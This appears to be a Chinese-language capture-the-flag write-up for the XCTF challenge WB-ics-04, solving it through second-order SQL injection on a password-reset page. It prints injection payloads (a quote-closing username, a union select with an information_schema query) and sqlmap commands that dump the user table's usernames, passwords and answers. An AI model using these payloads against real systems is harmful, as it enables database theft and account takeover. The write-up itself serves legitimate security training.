XCTF--WB-ics-04

XCTF–WB-ics-04

看到注册我们先尝试注册。==
XCTF--WB-ics-04_第1张图片XCTF--WB-ics-04_第2张图片我们登录显示普通用户
XCTF--WB-ics-04_第3张图片我们看看忘记密码
XCTF--WB-ics-04_第4张图片联想到以前sql注入天书里面的二次注入问题,尝试注册一个名为admin’#12345的用户后找回密码后将密码从123修改为12345,之后使用username:admin和password:12345实现了admin身份的登陆,结果还是提示普通用户登录成功。此时考虑可能此题不是一个提权的问题,我们可以在找回密码的页面实现二次注入且知道了闭合方式为单引号,测试一下username为admin’ or 1='1
XCTF--WB-ics-04_第5张图片发现密保问题不再是设定好的123了,变成了cetc,注入点存在,尝试联合注入
payload:-1’ union select 1,2,3,4#

XCTF--WB-ics-04_第6张图片得到回显,尝试读取flag
payload:-1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema =database()),4#不回显

XCTF--WB-ics-04_第7张图片输入任意数字抓包
XCTF--WB-ics-04_第8张图片将报文复制到txt文件中,进行sqlmap一波
XCTF--WB-ics-04_第9张图片sqlmap.py -r post.txt --dbs
XCTF--WB-ics-04_第10张图片sqlmap.py -r post.txt -D cetc004 --tables

在这里插入图片描述sqlmap.py -r post.txt -D cetc004 -T user --columns
XCTF--WB-ics-04_第11张图片sqlmap.py -r post.txt -D cetc004 -T user -C “answer” --dump
XCTF--WB-ics-04_第12张图片-r post.txt --dump -C “username,password” -T “user” -D “cetc004”
XCTF--WB-ics-04_第13张图片利用重复注册账号漏洞,注册账号c3tlwDmIn23,密码123456,登录成功,取得flag
XCTF--WB-ics-04_第14张图片

你可能感兴趣的:(CTF,CTF)